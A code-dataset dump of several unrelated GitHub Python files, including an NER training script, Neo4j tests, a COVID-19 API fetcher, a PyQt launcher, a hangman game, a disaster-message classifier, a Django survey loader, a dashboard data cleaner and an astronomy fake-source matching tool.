drop_remainder=eval_drop_remainder)\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps)\n output_eval_file = os.path.join(output_dir, \"eval_results.txt\")\n with codecs.open(output_eval_file, \"w\", encoding='utf-8') as writer:\n tf.logging.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n if not os.path.exists(data_config_path):\n with codecs.open(data_config_path, 'a', encoding='utf-8') as fd:\n json.dump(data_config, fd)\n if params.do_predict:\n token_path = os.path.join(output_dir, \"token_test.txt\")\n if os.path.exists(token_path):\n os.remove(token_path)\n with codecs.open(os.path.join(output_dir, 'label2id.pkl'), 'rb') as rf:\n label2id = pickle.load(rf)\n id2label = {value: key for key, value in label2id.items()}\n predict_examples = processor.get_test_examples(data_dir)\n predict_file = os.path.join(output_dir, \"predict.tf_record\")\n filed_based_convert_examples_to_features(predict_examples, label_list,\n params.max_seq_length, tokenizer,\n predict_file, mode=\"test\",output_dir=output_dir)\n\n logger.info(\"***** Running prediction*****\")\n logger.info(\" Num examples = %d\", len(predict_examples))\n logger.info(\" Batch size = %d\", params.predict_batch_size)\n predict_drop_remainder = False\n predict_input_fn = file_based_input_fn_builder(\n input_file=predict_file,\n seq_length=params.max_seq_length,\n is_training=False,\n drop_remainder=predict_drop_remainder\n )\n\n predicted_result = estimator.evaluate(input_fn=predict_input_fn)\n output_eval_file = os.path.join(output_dir, \"predicted_results.txt\")\n with codecs.open(output_eval_file, \"w\", encoding='utf-8') as writer:\n tf.logging.info(\"***** Predict results *****\")\n for key in sorted(predicted_result.keys()):\n tf.logging.info(\" %s = %s\", key, str(predicted_result[key]))\n writer.write(\"%s = %s\\n\" % (key, 
str(predicted_result[key])))\n\n result = estimator.predict(input_fn=predict_input_fn)\n output_predict_file = os.path.join(output_dir, \"label_test.txt\")\n\n def result_to_pair(writer):\n for predict_line, prediction in zip(predict_examples, result):\n idx = 0\n line = ''\n line_token = str(predict_line.text).split(' ')\n label_token = str(predict_line.label).split(' ')\n if len(line_token) != len(label_token):\n tf.logging.info(predict_line.text)\n tf.logging.info(predict_line.label)\n for id in prediction:\n if id == 0:\n continue\n curr_labels = id2label[id]\n if curr_labels in ['[CLS]', '[SEP]']:\n continue\n try:\n line += line_token[idx] + ' ' + label_token[idx] + ' ' + curr_labels + '\\n'\n except Exception as e:\n tf.logging.info(e)\n tf.logging.info(predict_line.text)\n tf.logging.info(predict_line.label)\n line = ''\n break\n idx += 1\n writer.write(line + '\\n')\n\n with codecs.open(output_predict_file, 'w', encoding='utf-8') as writer:\n result_to_pair(writer)\n\n eval_result = return_report(output_predict_file)\n print(eval_result)\n\nif __name__ == '__main__':\n print(log_path)\n tf.app.run()","repo_name":"jxz542189/NER_project","sub_path":"blstm_crf/bert_blstm_crf.py","file_name":"bert_blstm_crf.py","file_ext":"py","file_size_in_byte":16811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19527947867","text":"import unittest\nfrom src.neo4j_persistence.entry import PersistentLayer\nfrom src.neo4j_persistence import cypher_builder\nfrom src.pickler import Pickler\n\ndef str_equal_in(str, strs):\n for nstr in strs:\n if nstr == str:\n return True\n\n return False\n\n\nclass TestNeo4jMethods(unittest.TestCase):\n\n @unittest.skip\n def test_rel_insertion(self):\n user = {\"name\": \"alex\", \"id\": '3'}\n followed = [\n ('宇宙无敌大羙麗', '15443091'),\n ('宇宙无敌大羙麗2', '15443093'),\n ('宇宙无敌大羙麗3', '15443094')\n ]\n PersistentLayer.insert_followed(user, followed)\n self.assertEqual(True, True)\n\n\n @unittest.skip\n def test_review_insertion(self):\n user = {\"name\": \"alex\", \"id\": '3'}\n reviews = Pickler.load_data(\"you need to provide data file name here\")\n PersistentLayer.insert_reviews(user, reviews)\n\n\n\nclass CypherBuilderTest(unittest.TestCase):\n def test_cypher_builder_without_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.build_placeholders(person)\n self.assertTrue(str_equal_in(\"{\" + result + \"}\", [\n \"{name: {name}, id: {id}}\",\n \"{id: {id}, name: {name}}\"\n ]))\n\n\n def test_cypher_builder_with_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.build_placeholders(person, \"p\")\n self.assertTrue(str_equal_in(\"{\" + result + \"}\", [\n \"{name: {pname}, id: {pid}}\",\n \"{id: {pid}, name: {pname}}\"\n ]))\n\n\n def test_cypher_dict_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.prefix_dict(person, \"p\")\n self.assertEqual(result, {\"pname\": \"alex\", \"pid\": \"3\"})\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"inter-action/dianping_crawler","sub_path":"tests/neo4j_test.py","file_name":"neo4j_test.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"70895419","text":"import requests\nimport urllib.parse\nimport datetime\nimport xmltodict # 따로 설치\nimport json\n\ndef getDCDcnt():\n with open(\"secret.json\") as json_file:\n json_data = json.load(json_file)\n\n url 
= \"http://openapi.data.go.kr/openapi/service/rest/Covid19/getCovid19InfStateJson\"\n service_key = json_data\n\n now = datetime.datetime.now()\n today = now.strftime(\"%Y%m%d\")\n yesterday_tmp = now - datetime.timedelta(days=1)\n yesterday = yesterday_tmp.strftime(\"%Y%m%d\")\n\n queryParams = \"?\" + urllib.parse.urlencode({\n urllib.parse.quote_plus(\"serviceKey\"): urllib.parse.unquote(service_key),\n urllib.parse.quote_plus(\"pageNo\"): \"1\",\n urllib.parse.quote_plus(\"numOfRows\"): \"10\",\n urllib.parse.quote_plus(\"startCreateDt\"): yesterday,\n urllib.parse.quote_plus(\"endCreateDt\"): today,\n })\n\n res = requests.get(url + queryParams)\n print(url + queryParams)\n xml = xmltodict.parse(res.text)\n dict1 = json.loads(json.dumps(xml))\n dict_data = dict1['response']['body']['items']['item']\n\n decide_cnt = int(dict_data[0][\"decideCnt\"]) - int(dict_data[1][\"decideCnt\"])\n \n return decide_cnt\n\nif __name__ == \"__main__\":\n getDCDcnt()","repo_name":"ted1117/SmartMirror_SEE2021","sub_path":"module/covid19cnt_api.py","file_name":"covid19cnt_api.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24168369849","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication\nfrom window_app.start_app import StartApp\nfrom PyQt5.QtGui import QIcon\nfrom multiprocessing import Process, Event, Value, freeze_support\nimport os\n\n\nclass Handy:\n\n def __init__(self):\n self.absolute_path = os.path.realpath(os.path.dirname(__file__))\n self.absolute_path = self.absolute_path.replace(\"\\\\\", \"/\")\n self.ui = None\n self.start_app = None\n self.start_app_widget = None\n self.app = None\n self.started = False\n self.start()\n\n def end_application(self):\n self.ui.close_application()\n\n def start_application(self):\n from window_app.main_window import Ui_main_window as win\n self.app = QtWidgets.QApplication(sys.argv)\n QtWidgets.QApplication.setWindowIcon(\n QIcon(self.absolute_path + '/logo.png'))\n self.app.setQuitOnLastWindowClosed(False)\n self.app.lastWindowClosed.connect(self.end_application)\n self.MainWindow = QtWidgets.QMainWindow()\n if self.v.value == 1:\n return\n self.ui = win(self.absolute_path)\n self.ui.setupUi(self.MainWindow)\n if self.v.value == 1:\n self.MainWindow.close()\n self.ui.close_application()\n return\n self.started = True\n self.e.set()\n try:\n self.p.terminate()\n except Exception:\n pass\n self.MainWindow.showMaximized()\n sys.exit(self.app.exec_())\n\n def start(self):\n self.v = Value('i', 0)\n self.e = Event()\n self.p = Process(target=self.start_temp_app, args=(self.e, self.v))\n self.p.daemon = True\n self.p.start()\n self.start_application()\n\n def assign(self, v):\n v.value = 1\n\n def start_temp_app(self, e, v):\n self.start_app = QApplication(sys.argv)\n self.start_app.setQuitOnLastWindowClosed(False)\n self.start_app.lastWindowClosed.connect(lambda: self.assign(v))\n QApplication.setWindowIcon(QIcon(self.absolute_path + '/logo.png'))\n self.start_app_widget = StartApp(e)\n sys.exit(self.start_app.exec_())\n\n\nif __name__ == '__main__':\n freeze_support()\n if sys.stdout is None:\n sys.stdout = open(os.devnull, \"w\")\n if sys.stderr is None:\n sys.stderr = open(os.devnull, \"w\")\n 
Handy()\n","repo_name":"Maurycjo/Handy-sterowanie-systemem-przy-pomocy-gestow","sub_path":"Handy.py","file_name":"Handy.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18504392107","text":"# list of words\n# draw lines for number of letters in word\n# draw stick figure getting hung\n\nfrom art import logo, post, head, body, arms, legs\nimport os\n\nimport random\nos.system('cls' if os.name == 'nt' else 'clear')\n\n\nhang_man = {\n 0:'',\n 1:post,\n 2:head,\n 3:body,\n 4:arms,\n 5:legs\n}\n\nwordlist = [word for word in (open('words.txt','r').read().splitlines())]\nsolution = [answer for answer in random.choice(wordlist)]\n\nguess = []\n\nprint(logo)\nno_guesses = len(solution)\nguessed_letters = []\nwrong_guess = 0\ngame_started = False\nwhile no_guesses > 0 and wrong_guess <5:\n \n if not game_started:\n for letter in solution:\n guess.append('_')\n game_started = True\n print(' '.join(guess))\n \n\n player_guess = input(\"Guess a letter: \").lower()\n\n \n valid_guess = False\n if player_guess in guessed_letters: \n while not valid_guess:\n \n player_guess = input(f\"You have already guessed '{player_guess}'. Try another letter: \").lower()\n valid_guess = True\n\n if player_guess not in solution:\n wrong_guess += 1\n\n else: \n guess_index = [n for n,x in enumerate(solution) if x==player_guess]\n for i in guess_index:\n guess[i] = player_guess \n no_guesses -= 1 \n guessed_letters.append(player_guess)\n print(' '.join(guess))\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(logo)\n print(hang_man[wrong_guess])\n if wrong_guess == 5:\n print(f\"Hangman! The correct word was {''.join(solution)}.\")\n elif no_guesses == 0:\n print(f\"You are correct! 
The word was {''.join(solution)}.\")\n\n ","repo_name":"sprogus/Hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34691300153","text":"import ctypes\nfrom typing import Tuple, Optional\n\nimport numba\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom collections import deque\n\nfrom src.library.graph.graph import Graph, TrackerCategory, Tracker\nfrom src.library.graph.verification import weighted_only, zero_weight\n\n\n@weighted_only\n@zero_weight\n@numba.jit(nopython=False, forceobj=True)\ndef binary_bfs(\n graph: Graph,\n start: int = 0,\n tracker: Optional[Tracker] = None\n) -> Tuple[NDArray, NDArray]:\n visited = np.zeros(graph.order, bool)\n visited[start] = True\n\n distance = np.full(graph.order, -1)\n distance[start] = 0\n\n traversal_tree = np.full(graph.order, -1)\n\n queue = deque([start])\n\n curr = ctypes.c_longlong(start)\n\n if tracker is not None:\n tracker.add(queue, TrackerCategory.QUEUE)\n tracker.add(distance, TrackerCategory.DISTANCE)\n tracker.add(traversal_tree, TrackerCategory.TREE)\n tracker.add(visited, TrackerCategory.VISITED)\n tracker.add(ctypes.pointer(curr), TrackerCategory.CURRENT)\n\n while len(queue) > 0:\n curr.value = queue.popleft()\n\n if tracker is not None:\n tracker.update()\n\n neighbours = graph.neighbours(curr.value)\n neighbours = neighbours[visited[neighbours] == False]\n visited[neighbours] = True\n\n neighbour_distances = graph.adj_matrix[curr.value, :]\n\n distance[neighbours] = distance[curr.value] + neighbour_distances[neighbours]\n\n traversal_tree[neighbours] = curr.value\n\n queue.extendleft(neighbours[neighbour_distances[neighbours] == 0])\n queue.extend(neighbours[neighbour_distances[neighbours] == 1])\n\n if tracker is not None:\n tracker.update()\n\n return distance, traversal_tree\n","repo_name":"integraledelebesgue/InteractiveGraphs","sub_path":"src/library/algorithms/traversals/binary_bfs.py","file_name":"binary_bfs.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27586531420","text":"# import packages\nimport nltk\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport re\nimport sys\nimport warnings\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics import classification_report, confusion_matrix, precision_recall_fscore_support\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sqlalchemy import create_engine\n\n# Loading nltk wordsets\nnltk.download(['punkt', 'wordnet', 'stopwords'])\n\ndef load_data(database_filepath):\n # Build SQL engine\n engine = create_engine(f'sqlite:///{database_filepath}')\n # Define SQL statement\n sql = 'SELECT * FROM CategorizedMessages'\n df = pd.read_sql(sql, engine)\n X = df.message\n Y = df.iloc[:, 4:]\n # Get Y labels\n Y_labels = list(Y)\n return X, Y, 
Y_labels\n\n\ndef tokenize(text):\n stop_words = stopwords.words(\"english\")\n lemmatizer = WordNetLemmatizer()\n # Normalize text\n text = text.lower()\n text = re.sub(r\"[^a-z0-9]\", \" \", text)\n # Tokenize text\n tokens = word_tokenize(text)\n # lemmatize and Remove stop words\n tokens = [\n lemmatizer.lemmatize(word) for word in tokens if word not in stop_words\n ]\n # Return\n return tokens\n\n\ndef build_model():\n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer(sublinear_tf=False)),\n ('clf',\n MultiOutputClassifier(\n RandomForestClassifier(n_jobs=1, \n n_estimators=100, \n random_state=179,\n criterion='entropy',\n max_depth=3,\n max_features=0.3,\n min_samples_split=3)))])\n \n parameters = {\n 'clf__estimator__min_samples_split': (3, 4),\n 'clf__estimator__max_features': ('sqrt', 0.3),\n 'clf__estimator__max_depth': (3, 5),\n 'clf__estimator__criterion': ('gini','entropy'),\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters,verbose= 10,n_jobs =-1)\n \n return cv\n\ndef evaluate_model(model, X_test, y_test, category_names):\n\n # Getting the model's predictions\n y_pred = model.predict(X_test)\n\n # Scoring the outputs\n accuracy = [[(y_pred[:, i] == y_test.values[:, i]).mean(),\n *precision_recall_fscore_support(\n y_test.values[:, i],\n y_pred[:, i],\n average='weighted',\n labels=np.unique(y_pred[:, i]))]\n for i in range(y_pred.shape[1])]\n accuracy = np.array(accuracy)[:, :-1]\n accuracy = (accuracy * 10000).astype(int) / 100\n\n print('Showing scores...')\n print('\\nAverage scores for all indicators...')\n scores = pd.DataFrame(\n data=accuracy,\n index=category_names,\n columns=['Accuracy %', 'Precision %', 'Recall %', 'F-score %'])\n print(scores.mean(axis=0))\n print('\\Detailed scores for each indicator...')\n print(scores)\n return scores\n\n\ndef save_model(model, model_filepath='NesrFittedModel'):\n '''\n Saves the {model} as {model_filepath}\n in pickle format\n Returns:\n None\n '''\n filename=model_filepath\n ## Checking if a File Exists\n #if os.path.isfile(f'./{filename}.sav'):\n # n = 0\n # while os.path.isfile(f'{filename}{n:02d}.sav'):\n # n += 1\n # else:\n # filename = f'{filename}{n:02d}.sav'\n\n # save the model to disk\n pickle.dump(model, open(filename, 'wb'))\n print(f'The model has been saved as: {filename}')\n pass\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. 
\\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"drnesr/DisasterResponsePipelines","sub_path":"Stage2/models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12970421714","text":"from survey.models import Image, Survey_Collection, Image_Collection, User, Survey, Choice, Image_Transformation\nimport yaml\nimport random\n\n# Usage for a command line execution:\n# python manage.py runscript image_collection_loader --script-args survey/static/survey/collection/new_collection.yaml\n\nerrorMsg = {\n 1: \"Incorrect parameters! file.yaml is needed\",\n 2: \"The new collection doesn't have any choices for the answer!\",\n 3: \"The collection is empty!\",\n 4: \"Choices need a name!\"\n}\n\n\ndef decision(probability):\n \"\"\"\n Make a decision from a probability parameter given in input\n :param probability: Float number representing the probability\n :return: True if the random number is lower than probability number given in input, False otherwise\n \"\"\"\n return random.random() < probability\n\n\ndef apply_transformations(image_transformation, transformations, user_id):\n \"\"\"\n Calculate which transformation will be applied to the user given in input and write the list of transformations\n on the database\n :param image_transformation: instance of :model:`survey.Image_Transformation`\n :param transformations: String with the list of transformation separated by comma\n :param user_id: id of user whose want to calculate transformations\n :return: None\n \"\"\"\n image_transformation.applied_transformation = ''\n for transformation in transformations.split(','):\n probability = float(transformation.split('(')[1].split(')')[0])\n transformation = transformation.split('(')[0]\n if decision(probability):\n # Write here transformation parameter if required\n if transformation == 'contrast':\n # Setting the factor parameter in a (0.5, 1.5) threshold\n factor = \"%.2f\" % random.uniform(0.5, 1.5)\n transformation += f'({factor})'\n\n if image_transformation.applied_transformation == '':\n image_transformation.applied_transformation = transformation\n else:\n image_transformation.applied_transformation += ',' + transformation\n\n print(f\"User_id: {user_id} Applied Transformations: {image_transformation.applied_transformation}\")\n image_transformation.save()\n\n\ndef add_images(images, collection_object):\n \"\"\"\n Write image's information on the database and connect it to the corresponding Survey Collection\n :param images: A list of dictionary containing information about new images\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n for img in images:\n path = img['path']\n name = img.get('name', (path.split('/')[-1]).split('.')[0])\n transformations = collection_object.transformations\n\n image_object = Image.objects.get_or_create(\n path=path,\n name=name,\n )[0]\n print(f\"path: {image_object.path} name: {image_object.name}\")\n image_collection_object = Image_Collection.objects.get_or_create(image_id=image_object.id,\n survey_collection_id=collection_object.id)\n image_collection_object[0].save()\n print(f\"Image_collection id: {image_collection_object[0].id} \"\n f\"Image_collection image_id: {image_collection_object[0].image_id} \"\n f\"Image_collection survey_collection_id: 
{image_collection_object[0].survey_collection_id}\")\n\n users_id = [user['user_id'] for user in Survey.objects.filter(\n survey_collection_id=collection_object.id).values('user_id')]\n for user_id in users_id:\n image_transformation = Image_Transformation.objects.update_or_create(\n user_id=user_id, image_collection_id=image_collection_object[0].id)[0]\n apply_transformations(image_transformation, transformations, user_id)\n\n\ndef add_users(users, collection_object):\n \"\"\"\n Write new user on database\n :param users: A list of username\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n print(f\"Adding new Users: {users}\")\n for user in users:\n user_object = User.objects.filter(username=user).first()\n obj, created = Survey.objects.get_or_create(survey_collection_id=collection_object.id, user_id=user_object.id)\n if created:\n print(f\"User id: {user_object.id} Username: {user_object.username} added!\")\n img_collection_ids = [img_collection['id'] for img_collection in\n Image_Collection.objects.filter(survey_collection_id=collection_object.id)\n .values('id')]\n for img_collection_id in img_collection_ids:\n image_transformation = Image_Transformation.objects.update_or_create(\n user_id=user_object.id, image_collection_id=img_collection_id)[0]\n apply_transformations(image_transformation, collection_object.transformations, user_object.id)\n\n\ndef add_choices(choices, collection_object):\n \"\"\"\n Write choices on the database\n :param choices: A list of choices\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None or a specific error code\n \"\"\"\n print(f\"Choices: {choices}\")\n for choice in choices:\n name = choice.get('name')\n if name is None:\n print(f\"Error: {errorMsg[4]}\")\n return 4\n\n choice_object = Choice.objects.get_or_create(name=choice['name'], survey_collection_id=collection_object.id)\n print(f\"Choice id: {choice_object[0].id} Choice name: {choice_object[0].name} \"\n f\"Collection id: {choice_object[0].survey_collection_id} added!\")\n\n\ndef add_transformations(transformations, collection_object):\n \"\"\"\n Write possibly transformations on the Survey Collection as a Transformations field\n :param transformations: List of transformations\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n print(f\"Transformations: {transformations}\")\n transformation_field = transformations[0]\n for transformation in transformations[1:]:\n transformation_field += ',' + transformation\n\n collection_object.transformations = transformation_field\n collection_object.save()\n\n\ndef create_or_modify_collections(data):\n \"\"\"\n Function to create or modify collections by giving a yaml data object\n :param data: An yaml object obtained by yaml.load function\n :return: 0 if the function found no errors, otherwise return a specific error code\n \"\"\"\n collection = data.get('collection')\n if collection is None:\n print(f\"Error: {errorMsg[3]}\")\n return 3\n\n collection_id = collection.get('id')\n description = collection.get('description', '')\n choices = collection.get('choices')\n transformations = collection.get('transformations')\n\n if collection_id is not None:\n print(f\"Modifico la collection {collection_id}\")\n collection_object = Survey_Collection.objects.get(id=collection_id)\n print(f\"Collecion id: {collection_object.id} Collection description: {collection_object.description}\")\n\n if description != '':\n 
collection_object.description = description\n collection_object.save()\n print(f\"New description: {collection_object.description}\")\n\n else:\n print(\"Creo una nuova collection\")\n if choices is None:\n print(f\"Error: {errorMsg[2]}\")\n return 2\n collection_object = Survey_Collection(description=description)\n collection_object.save()\n print(f\"Collection id: {collection_object.id}\")\n\n if transformations is not None:\n add_transformations(transformations, collection_object)\n\n if choices is not None:\n add_choices(choices, collection_object)\n\n images = collection.get('images')\n if images is not None:\n add_images(images, collection_object)\n\n users = collection.get('users')\n if users is not None:\n add_users(users, collection_object)\n\n return 0\n\n\ndef run(*args):\n \"\"\"\n This function is called by runscript command of manage.py to upload a YAML Configuration File by command line\n :param args: Arguments of the function, args[0] must contain the path of YAML Configuration File\n :return: :func:`create_or_modify_collections`\n \"\"\"\n if len(args) != 1:\n print(f\"Error: {errorMsg[1]}\")\n return 1\n\n print(f\"Load: {args[0]}\")\n file = open(args[0], \"r\")\n data = yaml.load(file, Loader=yaml.FullLoader)\n print(data)\n\n return create_or_modify_collections(data)\n","repo_name":"MicheleMosca/SurveyProject","sub_path":"survey/scripts/image_collection_loader.py","file_name":"image_collection_loader.py","file_ext":"py","file_size_in_byte":8710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11599027430","text":"import pandas as pd\nfrom dash_application.config import config\nimport psycopg2\nimport calendar\n\ndef clean_data(sme_main):\n \n sme_main.rename(columns={'Client Mobile NO': 'client_contact_no',\n 'Order ID': 'order_id', 'Client City': 'client_city', 'Client Address': 'client_address', \n 'Business': 'sme_name', 'Status': 'order_status', 'Reason of failure': 'order_reason_of_failure', \n 'Driver': 'driver_name', 'Fees': 'order_delivery_fees', 'Order Value': 'order_value','Date': 'order_date'}, inplace=True)\n #Dropping irrelevant columns and those with null values,repeating values, and incorrect order_id\n sme_main.drop(['Count','Order Status','Business Address','Business City','Viecle','Client Zone'], axis=1, inplace=True)\n #Dropping negative order values, null or incorrect IDs and contact numbers and null client addresses\n sme_main = sme_main[sme_main['order_value']>=0]\n sme_main.dropna(subset=['order_id','client_contact_no','client_address'], inplace=True) \n sme_main.drop(sme_main[(sme_main['order_id']< 100000) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['order_id']> 999999) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['client_contact_no']> 999999999) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['client_contact_no']< 100000000) ].index,inplace=True)\n #One of the order statuses was null and after referring to the org, delivered was replaced\n sme_main[['order_status']] = sme_main[['order_status']].fillna('Delivered')\n #Formatting date\n try:\n sme_main['order_date']=pd.to_datetime(sme_main['order_date'],format='%Y-%m-%d')\n except:\n sme_main['order_date']=pd.to_datetime(sme_main['order_date'],format='%m/%d/%Y')\n #exporting the cleaned data to csv to then be uploaded into the database\n sme_main.to_csv('dash_application/csv/order_table.csv', index=False)\n #Creating new features\n sme_main['day'] = pd.DatetimeIndex(sme_main['order_date']).day\n 
sme_main['year'] = pd.DatetimeIndex(sme_main['order_date']).year\n sme_main['month']= pd.DatetimeIndex(sme_main['order_date']).month\n sme_main['week'] = (sme_main['order_date'].dt.strftime('%W').astype(int) + 1)\n sme_main['month_name'] = sme_main['month'].apply(lambda x: calendar.month_name[x])\n #calculating stakeholders individual shares\n sme_main['driver_fee'] = sme_main['order_delivery_fees']*0.7\n sme_main['halan_return'] = sme_main['order_delivery_fees']*0.3\n sme_main['sme_return'] = sme_main['order_value'] - sme_main['order_delivery_fees']\n\n return sme_main\n \ndef parseCSV(filePath,user_id):\n sme_main = pd.read_csv(filePath)\n sme_main = clean_data(sme_main)\n # sme_main.to_csv('dash_application/csv/sme_main.csv', index=False)\n\n with open('dash_application/csv/order_table.csv', 'r') as f: \n params = config()\n conn = psycopg2.connect(**params)\n cursor = conn.cursor() \n cmd = 'COPY sme_main(client_contact_no,order_id, client_city,client_address, sme_name,order_status,order_reason_of_failure,driver_name,order_delivery_fees, order_value, order_date) FROM STDIN WITH (FORMAT CSV, HEADER TRUE)'\n cursor.copy_expert(cmd, f)\n conn.commit()\n\n\n ","repo_name":"blackatron/Halan_Dashboard","sub_path":"dash_application/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14202272238","text":"import sys\n\ninput = sys.stdin.readline\n\ninf = 10000\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\nmin_sum = 20000\nanswer = -1\nq = []\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(1, n + 1):\n check = [False] * (n + 1)\n check[i] = True\n q.append(i)\n sum = 0\n depth = -1\n while q:\n depth += 1\n for _ in range(len(q)):\n cur = q.pop(0)\n sum += depth\n for near in graph[cur]:\n if not check[near]:\n check[near] = True\n q.append(near)\n if sum < min_sum:\n min_sum = sum\n answer = i\nprint(answer)\n","repo_name":"ttasjwi/algorithm","sub_path":"문제풀이/온라인 저지/백준/# 10. Silver Ⅰ/# 01389. 
케빈 베이컨의 6단계 법칙/python/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21735380610","text":"#!/usr/bin/env python\n\"\"\"\nrunMatchFakes.py\nmatches fakes based on position stored in the calibrated exposure image header\n\"\"\"\n\nimport argparse\nimport fakes.matchFakes as matchFakes\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('rootDir', help='root dir of data repo')\n parser.add_argument('visit',\n help='id of visit (or tract, if filter is specified)',\n type=int)\n parser.add_argument('-f', '--filter', dest='filt',\n help='name of filter, if none assume single visit',\n default=None)\n parser.add_argument('--ccd', nargs='+', help='id of ccd(s) or patches')\n parser.add_argument('-o', help='outputfilename', default=None,\n dest='outfile')\n parser.add_argument('-c', help='fake catalog', default=None,\n dest='fakeCat')\n parser.add_argument('-w', '--overwrite', help='overwrite output file',\n dest='ow', default=False, action='store_true')\n parser.add_argument('-m', '--multiband',\n help='Match multiband measurements',\n dest='multiband', default=False, action='store_true')\n parser.add_argument('-t', '--tolerance', type=float, dest='tol',\n default=1.0,\n help='matching radius in PIXELS (default=1.0)')\n parser.add_argument('-p', '--pixelMatch', default=False,\n action='store_true',\n help='do a pixel position match based on the header')\n parser.add_argument('-r', '--reffMatch',\n help='Match the fake sources using tol x Reff',\n dest='reffMatch', default=False, action='store_true')\n parser.add_argument('--min', '--minRad',\n help='Min matching radius (pixel) when -r is set',\n dest='minRad', type=float, default=None)\n parser.add_argument('-j', '--multijobs', type=int,\n help='Number of jobs run at the same time',\n dest='multijobs', default=1)\n parser.add_argument('--ra', '--raCol', dest='raCol',\n help='Name of the column for RA',\n default='RA')\n parser.add_argument('--dec', '--decCol', dest='decCol',\n help='Name of the column for Dec',\n default='Dec')\n args = parser.parse_args()\n\n if (args.ccd is None) or (len(args.ccd) < 1):\n if args.filt is None:\n args.ccd = range(104)\n else:\n \"\"\"hack, assumes 11x11 patches per CCD\"\"\"\n args.ccd = ['%d,%d' % (x, y) for x in range(11) for y in range(11)]\n\n matchFakes.returnMatchTable(args.rootDir, args.visit, args.ccd,\n args.outfile, args.fakeCat,\n overwrite=args.ow, filt=args.filt,\n tol=args.tol,\n pixMatch=args.pixelMatch,\n multiband=args.multiband,\n reffMatch=args.reffMatch,\n multijobs=args.multijobs,\n minRad=args.minRad,\n raCol=args.raCol, decCol=args.decCol)\n","repo_name":"dr-guangtou/synpipe","sub_path":"bin/runMatchFakes.py","file_name":"runMatchFakes.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"24661298985","text":"'''\n\n\n주사위 쌓기\n\n\n\n주사위를 수직으로 쌓을때 서로 